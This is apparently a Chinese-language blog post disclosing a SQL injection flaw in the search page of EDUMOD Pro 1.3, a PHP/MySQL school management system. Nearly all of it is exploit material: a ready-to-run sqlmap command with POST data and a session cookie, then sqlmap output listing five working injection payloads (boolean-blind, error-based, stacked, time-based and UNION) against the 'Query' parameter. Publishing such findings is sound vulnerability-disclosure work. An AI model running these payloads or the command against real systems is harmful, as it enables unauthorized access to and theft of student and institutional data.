AD

EDUMOD_Pro_1.3_SQL_Injection

受影响产品简介:
EDUMOD是一个用于高校的WEB管理系统,使用phpmysql技术,有多个用于各种学校事务管理的模块。

产品地址:

POC
POST请求

SQLMAP测试:
sqlmap -u "http://localhost/students/search.php" --cookie="_gat=1; _omappvp=true; _omappvs=true; _ga=GA1.2.810440502.1501701941; _gid=GA1.2.661879708.1501701941; PHPSESSID=i7gcjsi41rbm48ejn2a1ddgfti"
--data="Query=Test&action=Search"

---
Parameter: Query (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Query=Test%' AND 5466=5466 AND '%'='&action=Search

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
    Payload: Query=Test%' AND (SELECT 7257 FROM(SELECT COUNT(*),CONCAT(0x717a7a7
671,(SELECT (ELT(7257=7257,1))),0x7171767871,FLOOR(RAND(0)*2))x FROM INFORMATION
_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&action=Search

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: Query=Test%';SELECT SLEEP(5)#&action=Search

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: Query=Test%' AND SLEEP(5) AND '%'='&action=Search

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: Query=Test%' UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a7671,0x4d715
07376585366416c53467453544e687853795747574a627351635357467676616366706e6355,0x71
71767871),NULL,NULL-- SXjD&action=Search

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

多种方法绕过POWERSHELL的执行策略